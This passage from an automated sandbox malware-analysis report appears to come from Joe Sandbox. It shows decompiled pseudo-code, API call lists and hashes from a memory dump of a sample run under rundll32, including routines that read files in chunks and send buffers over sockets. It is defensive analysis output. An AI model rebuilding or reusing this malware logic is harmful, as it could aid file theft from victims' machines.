                                                                                              0x0426c0e6
                                                                                              0x0426c0f0
                                                                                              0x0426c0f0
                                                                                              0x0426c0be
                                                                                              0x0426c0be
                                                                                              0x0426c0c8
                                                                                              0x0426c0c8
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 042694D0: wsprintfW.USER32 ref: 04269510
                                                                                                • Part of subcall function 042694D0: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 0426954D
                                                                                                • Part of subcall function 042694D0: RegQueryValueExW.ADVAPI32(?,0429E09C,00000000,?,00000000,?), ref: 0426957C
                                                                                                • Part of subcall function 042694D0: RegCloseKey.ADVAPI32(?), ref: 04269592
                                                                                                • Part of subcall function 042694D0: wsprintfW.USER32 ref: 042695CB
                                                                                                • Part of subcall function 042694D0: OpenEventW.KERNEL32(001F0003,00000000,?), ref: 042695E2
                                                                                                • Part of subcall function 042694D0: CloseHandle.KERNEL32(00000000), ref: 042695ED
                                                                                              • Sleep.KERNEL32(000003E8), ref: 0426C0C8
                                                                                              • Sleep.KERNEL32(000007D0), ref: 0426C0D8
                                                                                              • Sleep.KERNEL32(000003E8), ref: 0426C0F0
                                                                                              • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 0426C0FC
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0426C10B
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0426C10E
                                                                                              • Sleep.KERNEL32(000003E8), ref: 0426C11E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$CloseOpen$Handlewsprintf$EventObjectQuerySingleThreadValueWait
                                                                                              • String ID: Dispatch
                                                                                              • API String ID: 3560866944-2137261068
                                                                                              • Opcode ID: 7cb487489e691ece046ad902e36767784333daad591c035ca15c429003e3ebab
                                                                                              • Instruction ID: 859ff0e238e4eee24dc3ef78c91902a229ac85b253b6329e424d770d94e9f7e4
                                                                                              • Opcode Fuzzy Hash: 7cb487489e691ece046ad902e36767784333daad591c035ca15c429003e3ebab
                                                                                              • Instruction Fuzzy Hash: 6FF02B717BC251B3F211737B5C85B3D62588F8871CF100315F663A21C0DDA87C81457A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 52%
                                                                                              			E042733C0(void* __ebx, int __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				long _v16;
                                                                                              				int _v20;
                                                                                              				struct _OVERLAPPED* _v24;
                                                                                              				long _v28;
                                                                                              				long _v32;
                                                                                              				signed int _v36;
                                                                                              				signed int _t51;
                                                                                              				signed int _t58;
                                                                                              				int _t65;
                                                                                              				DWORD* _t71;
                                                                                              				void* _t72;
                                                                                              				long _t73;
                                                                                              				signed int _t84;
                                                                                              				HANDLE* _t85;
                                                                                              				int _t86;
                                                                                              				signed int _t91;
                                                                                              				signed int _t97;
                                                                                              				long _t100;
                                                                                              				intOrPtr* _t101;
                                                                                              				signed int _t102;
                                                                                              				int _t104;
                                                                                              				struct _OVERLAPPED* _t106;
                                                                                              				signed int _t108;
                                                                                              				signed int _t109;
                                                                                              				signed int _t111;
                                                                                              
                                                                                              				_t51 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t51 ^ _t109;
                                                                                              				_t104 = __ecx;
                                                                                              				_v20 = __ecx;
                                                                                              				_t84 =  *((intOrPtr*)(__ecx + 0x7c)) -  *((intOrPtr*)(__ecx + 0x78)) >> 2;
                                                                                              				_v16 = _t84;
                                                                                              				if(_t84 > 0) {
                                                                                              					_t102 = _t84;
                                                                                              					asm("o16 nop [eax+eax]");
                                                                                              					do {
                                                                                              						PostQueuedCompletionStatus( *(__ecx + 0x50), 0, 0, 0);
                                                                                              						_t102 = _t102 - 1;
                                                                                              					} while (_t102 != 0);
                                                                                              				}
                                                                                              				_v12 = 0;
                                                                                              				if(_t84 <= 0) {
                                                                                              					L13:
                                                                                              					 *((intOrPtr*)(_t104 + 0x7c)) =  *((intOrPtr*)(_t104 + 0x78));
                                                                                              					return E04275AFE(_v8 ^ _t109);
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_t100 =  <  ? _t84 : 0x40;
                                                                                              						E04291860();
                                                                                              						_t91 = 0;
                                                                                              						_t85 = _t111;
                                                                                              						if(0x40 > 0) {
                                                                                              							_t97 = _v12 << 2;
                                                                                              							do {
                                                                                              								_t97 = _t97 + 4;
                                                                                              								_t85[_t91] =  *(_t97 +  *((intOrPtr*)(_t104 + 0x78)) - 4);
                                                                                              								_t91 = _t91 + 1;
                                                                                              							} while (_t91 < 0x40);
                                                                                              						}
                                                                                              						if(WaitForMultipleObjects(_t100, _t85, 1, 0xffffffff) != 0) {
                                                                                              							E04257AC0();
                                                                                              							asm("int3");
                                                                                              							asm("int3");
                                                                                              							asm("int3");
                                                                                              							asm("int3");
                                                                                              							asm("int3");
                                                                                              							asm("int3");
                                                                                              							asm("int3");
                                                                                              							asm("int3");
                                                                                              							asm("int3");
                                                                                              							asm("int3");
                                                                                              							asm("int3");
                                                                                              							asm("int3");
                                                                                              							_t110 = _t111;
                                                                                              							_t58 =  *0x42a4008; // 0xd33db39d
                                                                                              							_v36 = _t58 ^ _t111;
                                                                                              							_t101 = _v24;
                                                                                              							 *((intOrPtr*)( *_t101 + 0x128))(GetCurrentThreadId(), _t100, _t104, _t85, _t109, 0x80004005);
                                                                                              							while(1) {
                                                                                              								_t86 = 0;
                                                                                              								_t65 = GetQueuedCompletionStatus( *(_t101 + 0x50),  &_v16,  &_v28,  &_v24, 0xffffffff);
                                                                                              								_t106 = _v24;
                                                                                              								_v20 = _t65;
                                                                                              								if(_t106 != 0) {
                                                                                              									goto L20;
                                                                                              								}
                                                                                              								L17:
                                                                                              								_t72 = E042735A0(0, _t101, _t101, _v16, _v28);
                                                                                              								if(_t72 == 1) {
                                                                                              									while(1) {
                                                                                              										_t86 = 0;
                                                                                              										_t65 = GetQueuedCompletionStatus( *(_t101 + 0x50),  &_v16,  &_v28,  &_v24, 0xffffffff);
                                                                                              										_t106 = _v24;
                                                                                              										_v20 = _t65;
                                                                                              										if(_t106 != 0) {
                                                                                              											goto L20;
                                                                                              										}
                                                                                              										goto L17;
                                                                                              									}
                                                                                              									goto L20;
                                                                                              								}
                                                                                              								if(_t72 != 2) {
                                                                                              									_t106 = _v24;
                                                                                              									_t65 = _v20;
                                                                                              									goto L20;
                                                                                              								}
                                                                                              								_t73 = GetCurrentThreadId();
                                                                                              								 *((intOrPtr*)( *_t101 + 0x12c))();
                                                                                              								return E04275AFE(_v12 ^ _t110, _t73);
                                                                                              								goto L27;
                                                                                              								L20:
                                                                                              								if(_t65 == 0) {
                                                                                              									_v20 = _t86;
                                                                                              									_v32 = GetLastError();
                                                                                              									if( *((intOrPtr*)( *_t101 + 0x2c))() == 0) {
                                                                                              										_t86 = _v32;
                                                                                              									} else {
                                                                                              										_t71 =  &_v16;
                                                                                              										__imp__WSAGetOverlappedResult( *((intOrPtr*)(_t106 + 0x34)), _t106, _t71, 0,  &_v20);
                                                                                              										if(_t71 == 0) {
                                                                                              											__imp__#111();
                                                                                              											_t86 = _t71;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              								E04273680(_t101, _t101, _v28, _t106, _v16, _t86);
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t108 = 0;
                                                                                              							if(_t100 > 0) {
                                                                                              								do {
                                                                                              									CloseHandle(_t85[_t108]);
                                                                                              									_t108 = _t108 + 1;
                                                                                              								} while (_t108 < _t100);
                                                                                              							}
                                                                                              							goto L12;
                                                                                              						}
                                                                                              						goto L27;
                                                                                              						L12:
                                                                                              						_v12 = _v12 + _t100;
                                                                                              						_t84 = _v16 - _t100;
                                                                                              						_t104 = _v20;
                                                                                              						_v16 = _t84;
                                                                                              					} while (_t84 > 0);
                                                                                              					goto L13;
                                                                                              				}
                                                                                              				L27:
                                                                                              			}






























                                                                                              0x042733c6
                                                                                              0x042733cd
                                                                                              0x042733d2
                                                                                              0x042733d5
                                                                                              0x042733de
                                                                                              0x042733e1
                                                                                              0x042733e6
                                                                                              0x042733e8
                                                                                              0x042733ea
                                                                                              0x042733f0
                                                                                              0x042733f9
                                                                                              0x042733ff
                                                                                              0x042733ff
                                                                                              0x042733f0
                                                                                              0x04273404
                                                                                              0x0427340d
                                                                                              0x04273480
                                                                                              0x04273483
                                                                                              0x04273499
                                                                                              0x04273410
                                                                                              0x04273410
                                                                                              0x04273417
                                                                                              0x04273421
                                                                                              0x04273426
                                                                                              0x04273428
                                                                                              0x0427342c
                                                                                              0x04273431
                                                                                              0x04273434
                                                                                              0x04273437
                                                                                              0x0427343e
                                                                                              0x04273441
                                                                                              0x04273442
                                                                                              0x04273434
                                                                                              0x04273454
                                                                                              0x0427349f
                                                                                              0x042734a4
                                                                                              0x042734a5
                                                                                              0x042734a6
                                                                                              0x042734a7
                                                                                              0x042734a8
                                                                                              0x042734a9
                                                                                              0x042734aa
                                                                                              0x042734ab
                                                                                              0x042734ac
                                                                                              0x042734ad
                                                                                              0x042734ae
                                                                                              0x042734af
                                                                                              0x042734b1
                                                                                              0x042734b6
                                                                                              0x042734bd
                                                                                              0x042734c3
                                                                                              0x042734d1
                                                                                              0x042734d7
                                                                                              0x042734dc
                                                                                              0x042734ea
                                                                                              0x042734f0
                                                                                              0x042734f3
                                                                                              0x042734f8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042734fa
                                                                                              0x04273503
                                                                                              0x0427350b
                                                                                              0x042734d7
                                                                                              0x042734dc
                                                                                              0x042734ea
                                                                                              0x042734f0
                                                                                              0x042734f3
                                                                                              0x042734f8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042734f8
                                                                                              0x00000000
                                                                                              0x042734d7
                                                                                              0x04273510
                                                                                              0x04273512
                                                                                              0x04273515
                                                                                              0x00000000
                                                                                              0x04273515
                                                                                              0x0427356f
                                                                                              0x04273578
                                                                                              0x04273590
                                                                                              0x00000000
                                                                                              0x04273518
                                                                                              0x0427351a
                                                                                              0x0427351c
                                                                                              0x04273525
                                                                                              0x04273531
                                                                                              0x04273555
                                                                                              0x04273533
                                                                                              0x04273539
                                                                                              0x04273541
                                                                                              0x04273549
                                                                                              0x0427354b
                                                                                              0x04273551
                                                                                              0x04273551
                                                                                              0x04273549
                                                                                              0x04273531
                                                                                              0x04273563
                                                                                              0x04273563
                                                                                              0x04273456
                                                                                              0x04273456
                                                                                              0x0427345a
                                                                                              0x04273460
                                                                                              0x04273463
                                                                                              0x04273469
                                                                                              0x0427346a
                                                                                              0x04273460
                                                                                              0x00000000
                                                                                              0x0427345a
                                                                                              0x00000000
                                                                                              0x0427346e
                                                                                              0x04273471
                                                                                              0x04273474
                                                                                              0x04273476
                                                                                              0x04273479
                                                                                              0x0427347c
                                                                                              0x00000000
                                                                                              0x04273410
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 042733F9
                                                                                              • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF), ref: 0427344C
                                                                                              • CloseHandle.KERNEL32(?,?,00000001,000000FF), ref: 04273463
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 042734C8
                                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 042734EA
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0427351F
                                                                                              • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 04273541
                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,00000000), ref: 0427354B
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0427356F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CompletionCurrentErrorLastQueuedStatusThread$CloseHandleMultipleObjectsOverlappedPostResultWait
                                                                                              • String ID:
                                                                                              • API String ID: 1776276126-0
                                                                                              • Opcode ID: 49acc20ea2d14f087ca80f0b1bd4fffef10ed661b51319f499ff25159770d7ba
                                                                                              • Instruction ID: 3fa59c1d898bbb5193c3223ffd1e138a5964b8787de1a8eedfe0d206d852a45b
                                                                                              • Opcode Fuzzy Hash: 49acc20ea2d14f087ca80f0b1bd4fffef10ed661b51319f499ff25159770d7ba
                                                                                              • Instruction Fuzzy Hash: 92518272B10219AFDB15DFA9D888AAEFBB9FF48314F140169ED15A7250DB30BD00DB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 73%
                                                                                              			E042550B0(void* __ecx, LONG* _a4) {
                                                                                              				signed int _v8;
                                                                                              				long _v12;
                                                                                              				long _v16;
                                                                                              				struct _OVERLAPPED* _v20;
                                                                                              				long _v24;
                                                                                              				struct _OVERLAPPED* _v32;
                                                                                              				WCHAR* _t38;
                                                                                              				void* _t39;
                                                                                              				signed int _t41;
                                                                                              				signed int _t44;
                                                                                              				long _t45;
                                                                                              				long _t46;
                                                                                              				void* _t48;
                                                                                              				long _t55;
                                                                                              				signed int _t59;
                                                                                              				void* _t64;
                                                                                              				LONG* _t69;
                                                                                              				void* _t73;
                                                                                              				LONG* _t74;
                                                                                              				long _t76;
                                                                                              				void* _t77;
                                                                                              
                                                                                              				_t65 = __ecx;
                                                                                              				_t74 = _a4;
                                                                                              				_t73 = __ecx;
                                                                                              				_v20 = 0;
                                                                                              				if( *((intOrPtr*)(_t74 + 4)) == 0xffffffff) {
                                                                                              					L12:
                                                                                              					E04255220(_t65);
                                                                                              					__eflags = 0;
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_t38 = __ecx + 0x18;
                                                                                              					if( *((intOrPtr*)(__ecx + 0x2c)) >= 8) {
                                                                                              						_t38 =  *_t38;
                                                                                              					}
                                                                                              					_t39 = CreateFileW(_t38, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                              					_t64 = _t39;
                                                                                              					if(_t64 != 0xffffffff) {
                                                                                              						_v12 = 0;
                                                                                              						_t41 = GetFileSize(_t64,  &_v12);
                                                                                              						_v24 =  *((intOrPtr*)(_t74 + 4));
                                                                                              						_v8 = 0;
                                                                                              						_v8 = _v8 | _t41;
                                                                                              						asm("sbb esi, edx");
                                                                                              						_t44 = _v8 -  *((intOrPtr*)(_t74 + 4)) + 9;
                                                                                              						__eflags = _t44;
                                                                                              						_v8 = _t44;
                                                                                              						asm("adc esi, 0x0");
                                                                                              						if(__eflags < 0) {
                                                                                              							L9:
                                                                                              							_t76 = _v8;
                                                                                              						} else {
                                                                                              							if(__eflags > 0) {
                                                                                              								L8:
                                                                                              								_t76 = 0x40000;
                                                                                              								_v32 = 0;
                                                                                              							} else {
                                                                                              								__eflags = _t44 - 0x40000;
                                                                                              								if(_t44 <= 0x40000) {
                                                                                              									goto L9;
                                                                                              								} else {
                                                                                              									goto L8;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						_t45 = SetFilePointer(_t64, _v24, _a4, 0);
                                                                                              						__eflags = _t45 - 0xffffffff;
                                                                                              						if(_t45 != 0xffffffff) {
                                                                                              							_t21 = _t76 - 9; // -9
                                                                                              							_t46 = _t21;
                                                                                              							_v24 = _t46;
                                                                                              							__eflags = _t46;
                                                                                              							if(_t46 == 0) {
                                                                                              								goto L11;
                                                                                              							} else {
                                                                                              								_v16 = 0;
                                                                                              								_t48 = LocalAlloc(0x40, _t76);
                                                                                              								_t69 = _a4;
                                                                                              								_t77 = _t48;
                                                                                              								 *_t77 = 0x6b;
                                                                                              								 *(_t77 + 1) =  *_t69;
                                                                                              								 *(_t77 + 5) = _t69[1];
                                                                                              								_t30 = _t77 + 9; // 0x9
                                                                                              								ReadFile(_t64, _t30, _v24,  &_v16, 0);
                                                                                              								CloseHandle(_t64);
                                                                                              								_t55 = _v16;
                                                                                              								__eflags = _t55;
                                                                                              								if(_t55 == 0) {
                                                                                              									E04255220(_t73);
                                                                                              									LocalFree(_t77);
                                                                                              									return _v20;
                                                                                              								} else {
                                                                                              									_push(_t69);
                                                                                              									_t59 = _t55 + 9;
                                                                                              									__eflags = _t59;
                                                                                              									_push(0x4f);
                                                                                              									_push(_t59);
                                                                                              									_push(_t77);
                                                                                              									_v20 = E04251C60( *((intOrPtr*)(_t73 + 4)));
                                                                                              									LocalFree(_t77);
                                                                                              									return _v20;
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							L11:
                                                                                              							CloseHandle(_t64);
                                                                                              							_t65 = _t73;
                                                                                              							goto L12;
                                                                                              						}
                                                                                              					} else {
                                                                                              						return _t39;
                                                                                              					}
                                                                                              				}
                                                                                              			}
























                                                                                              0x042550b0
                                                                                              0x042550b8
                                                                                              0x042550bc
                                                                                              0x042550be
                                                                                              0x042550c9
                                                                                              0x0425517a
                                                                                              0x0425517a
                                                                                              0x0425517f
                                                                                              0x04255187
                                                                                              0x042550cf
                                                                                              0x042550d3
                                                                                              0x042550d6
                                                                                              0x042550d8
                                                                                              0x042550d8
                                                                                              0x042550ed
                                                                                              0x042550f3
                                                                                              0x042550f8
                                                                                              0x04255108
                                                                                              0x04255111
                                                                                              0x0425511c
                                                                                              0x04255127
                                                                                              0x0425512e
                                                                                              0x04255136
                                                                                              0x04255138
                                                                                              0x04255138
                                                                                              0x0425513b
                                                                                              0x0425513e
                                                                                              0x04255141
                                                                                              0x0425515a
                                                                                              0x0425515a
                                                                                              0x04255143
                                                                                              0x04255143
                                                                                              0x0425514c
                                                                                              0x0425514c
                                                                                              0x04255151
                                                                                              0x04255145
                                                                                              0x04255145
                                                                                              0x0425514a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425514a
                                                                                              0x04255143
                                                                                              0x04255166
                                                                                              0x0425516c
                                                                                              0x0425516f
                                                                                              0x0425518a
                                                                                              0x0425518a
                                                                                              0x0425518d
                                                                                              0x04255190
                                                                                              0x04255192
                                                                                              0x00000000
                                                                                              0x04255194
                                                                                              0x04255197
                                                                                              0x0425519e
                                                                                              0x042551a4
                                                                                              0x042551a7
                                                                                              0x042551ab
                                                                                              0x042551b0
                                                                                              0x042551b6
                                                                                              0x042551c0
                                                                                              0x042551c5
                                                                                              0x042551cc
                                                                                              0x042551d2
                                                                                              0x042551d5
                                                                                              0x042551d7
                                                                                              0x04255201
                                                                                              0x04255207
                                                                                              0x04255216
                                                                                              0x042551d9
                                                                                              0x042551d9
                                                                                              0x042551dd
                                                                                              0x042551dd
                                                                                              0x042551e0
                                                                                              0x042551e2
                                                                                              0x042551e3
                                                                                              0x042551ea
                                                                                              0x042551ed
                                                                                              0x042551fc
                                                                                              0x042551fc
                                                                                              0x042551d7
                                                                                              0x04255171
                                                                                              0x04255171
                                                                                              0x04255172
                                                                                              0x04255178
                                                                                              0x00000000
                                                                                              0x04255178
                                                                                              0x042550fa
                                                                                              0x04255102
                                                                                              0x04255102
                                                                                              0x042550f8

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 042550ED
                                                                                              • GetFileSize.KERNEL32(00000000,?), ref: 04255111
                                                                                              • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 04255166
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04255172
                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 0425519E
                                                                                              • ReadFile.KERNEL32(00000000,00000009,?,00000000,00000000), ref: 042551C5
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 042551CC
                                                                                              • LocalFree.KERNEL32(00000000,00000000,-00000009,0000004F), ref: 042551ED
                                                                                              • LocalFree.KERNEL32(00000000), ref: 04255207
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Local$CloseFreeHandle$AllocCreatePointerReadSize
                                                                                              • String ID:
                                                                                              • API String ID: 1193681933-0
                                                                                              • Opcode ID: 9166676078f159292d5038cc55d8d0e95f5b41c156a8cf7bd1e844194d98ac76
                                                                                              • Instruction ID: 5e0a8d79a27af79386286755c958d3c989c96f0b56bd56b795844d5c98fd0459
                                                                                              • Opcode Fuzzy Hash: 9166676078f159292d5038cc55d8d0e95f5b41c156a8cf7bd1e844194d98ac76
                                                                                              • Instruction Fuzzy Hash: 04418675B00205BBD710DFB8E844BAEFBB8EB08325F108666E915E7290D775AD418B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 80%
                                                                                              			E0426E540(intOrPtr* __ecx) {
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _t43;
                                                                                              				long _t44;
                                                                                              				void* _t50;
                                                                                              				long _t52;
                                                                                              				void* _t53;
                                                                                              				void* _t63;
                                                                                              				intOrPtr _t66;
                                                                                              				intOrPtr* _t71;
                                                                                              				struct _CRITICAL_SECTION* _t76;
                                                                                              				struct _CRITICAL_SECTION* _t78;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t71 = __ecx;
                                                                                              				while( *((intOrPtr*)(_t71 + 0x180)) > 0) {
                                                                                              					_t2 = _t71 + 0x14c; // 0x14d
                                                                                              					_t76 = _t2;
                                                                                              					EnterCriticalSection(_t76);
                                                                                              					_t63 =  *(_t71 + 0x168);
                                                                                              					if(_t63 ==  *(_t71 + 0x16c)) {
                                                                                              						if(_t63 != 0) {
                                                                                              							 *(_t71 + 0x168) = 0;
                                                                                              							 *(_t71 + 0x16c) = 0;
                                                                                              							goto L6;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t53 =  *(_t63 + 4);
                                                                                              						 *(_t71 + 0x168) = _t53;
                                                                                              						 *(_t53 + 8) = 0;
                                                                                              						L6:
                                                                                              						if(_t63 != 0) {
                                                                                              							 *(_t63 + 4) = 0;
                                                                                              							 *(_t63 + 8) = 0;
                                                                                              							 *((intOrPtr*)(_t71 + 0x164)) =  *((intOrPtr*)(_t71 + 0x164)) - 1;
                                                                                              						}
                                                                                              					}
                                                                                              					LeaveCriticalSection(_t76);
                                                                                              					if(_t63 == 0) {
                                                                                              						break;
                                                                                              					} else {
                                                                                              						_t66 =  *((intOrPtr*)(_t63 + 0x14));
                                                                                              						_t43 =  *((intOrPtr*)(_t63 + 0x18)) - _t66;
                                                                                              						__imp__#19( *((intOrPtr*)(_t71 + 0x1c)), _t66, _t43, 0);
                                                                                              						_v24 = _t43;
                                                                                              						if(_t43 <= 0) {
                                                                                              							if(_t43 == 0xffffffff) {
                                                                                              								__imp__#111();
                                                                                              								if(_t43 != 0x2733) {
                                                                                              									_t36 = _t71 + 0x84; // 0x85
                                                                                              									 *((intOrPtr*)(_t71 + 0xc)) = 1;
                                                                                              									 *((intOrPtr*)(_t71 + 0x10)) = 3;
                                                                                              									 *((intOrPtr*)(_t71 + 0x14)) = _t43;
                                                                                              									 *((intOrPtr*)(_t71 + 0x18)) = 1;
                                                                                              									_t44 = E0426C930(_t36, _t63);
                                                                                              									if(_t44 == 0) {
                                                                                              										HeapFree( *( *_t63), _t44, _t63);
                                                                                              									}
                                                                                              									return 0;
                                                                                              								} else {
                                                                                              									_t25 = _t71 + 0x14c; // 0x14d
                                                                                              									_t78 = _t25;
                                                                                              									EnterCriticalSection(_t78);
                                                                                              									_t50 =  *(_t71 + 0x168);
                                                                                              									if(_t50 == 0) {
                                                                                              										 *(_t63 + 8) = 0;
                                                                                              										 *(_t63 + 4) = 0;
                                                                                              										 *(_t71 + 0x16c) = _t63;
                                                                                              									} else {
                                                                                              										 *(_t50 + 8) = _t63;
                                                                                              										 *(_t63 + 4) =  *(_t71 + 0x168);
                                                                                              									}
                                                                                              									 *((intOrPtr*)(_t71 + 0x164)) =  *((intOrPtr*)(_t71 + 0x164)) + 1;
                                                                                              									 *(_t71 + 0x168) = _t63;
                                                                                              									LeaveCriticalSection(_t78);
                                                                                              									break;
                                                                                              								}
                                                                                              							} else {
                                                                                              								goto L12;
                                                                                              							}
                                                                                              						} else {
                                                                                              							EnterCriticalSection(_t76);
                                                                                              							 *((intOrPtr*)(_t71 + 0x180)) =  *((intOrPtr*)(_t71 + 0x180)) - _v28;
                                                                                              							LeaveCriticalSection(_t76);
                                                                                              							SetLastError(0);
                                                                                              							 *((intOrPtr*)( *_t71 + 0x84))( *((intOrPtr*)(_t63 + 0x14)), _v28);
                                                                                              							L12:
                                                                                              							_t24 = _t71 + 0x84; // 0x85
                                                                                              							_t52 = E0426C930(_t24, _t63);
                                                                                              							if(_t52 == 0) {
                                                                                              								HeapFree( *( *_t63), _t52, _t63);
                                                                                              							}
                                                                                              							continue;
                                                                                              						}
                                                                                              					}
                                                                                              					L23:
                                                                                              				}
                                                                                              				return 1;
                                                                                              				goto L23;
                                                                                              			}















                                                                                              0x0426e546
                                                                                              0x0426e54a
                                                                                              0x0426e550
                                                                                              0x0426e55d
                                                                                              0x0426e55d
                                                                                              0x0426e564
                                                                                              0x0426e56a
                                                                                              0x0426e576
                                                                                              0x0426e58c
                                                                                              0x0426e58e
                                                                                              0x0426e598
                                                                                              0x00000000
                                                                                              0x0426e598
                                                                                              0x0426e578
                                                                                              0x0426e578
                                                                                              0x0426e57b
                                                                                              0x0426e581
                                                                                              0x0426e5a2
                                                                                              0x0426e5a4
                                                                                              0x0426e5a6
                                                                                              0x0426e5ad
                                                                                              0x0426e5b4
                                                                                              0x0426e5b4
                                                                                              0x0426e5a4
                                                                                              0x0426e5bb
                                                                                              0x0426e5c3
                                                                                              0x00000000
                                                                                              0x0426e5c9
                                                                                              0x0426e5c9
                                                                                              0x0426e5d1
                                                                                              0x0426e5d8
                                                                                              0x0426e5de
                                                                                              0x0426e5e4
                                                                                              0x0426e61d
                                                                                              0x0426e644
                                                                                              0x0426e64f
                                                                                              0x0426e6ab
                                                                                              0x0426e6b1
                                                                                              0x0426e6b8
                                                                                              0x0426e6bf
                                                                                              0x0426e6c2
                                                                                              0x0426e6c9
                                                                                              0x0426e6d0
                                                                                              0x0426e6d8
                                                                                              0x0426e6d8
                                                                                              0x0426e6e6
                                                                                              0x0426e651
                                                                                              0x0426e656
                                                                                              0x0426e656
                                                                                              0x0426e65d
                                                                                              0x0426e65f
                                                                                              0x0426e667
                                                                                              0x0426e677
                                                                                              0x0426e67e
                                                                                              0x0426e685
                                                                                              0x0426e669
                                                                                              0x0426e669
                                                                                              0x0426e672
                                                                                              0x0426e672
                                                                                              0x0426e68b
                                                                                              0x0426e692
                                                                                              0x0426e698
                                                                                              0x00000000
                                                                                              0x0426e698
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426e5e6
                                                                                              0x0426e5ec
                                                                                              0x0426e5f2
                                                                                              0x0426e5f9
                                                                                              0x0426e601
                                                                                              0x0426e612
                                                                                              0x0426e61f
                                                                                              0x0426e620
                                                                                              0x0426e626
                                                                                              0x0426e62d
                                                                                              0x0426e639
                                                                                              0x0426e639
                                                                                              0x00000000
                                                                                              0x0426e62d
                                                                                              0x0426e5e4
                                                                                              0x00000000
                                                                                              0x0426e5c3
                                                                                              0x0426e6a9
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RtlEnterCriticalSection.NTDLL(0000014D), ref: 0426E564
                                                                                              • RtlLeaveCriticalSection.NTDLL(0000014D), ref: 0426E5BB
                                                                                              • send.WS2_32(?,00000000,00000001,00000000), ref: 0426E5D8
                                                                                              • RtlLeaveCriticalSection.NTDLL(0000014D), ref: 0426E5F9
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0426E601
                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 0426E639
                                                                                              • WSAGetLastError.WS2_32 ref: 0426E644
                                                                                              • RtlLeaveCriticalSection.NTDLL(0000014D), ref: 0426E698
                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 0426E6D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$ErrorFreeHeapLast$Entersend
                                                                                              • String ID:
                                                                                              • API String ID: 1657114447-0
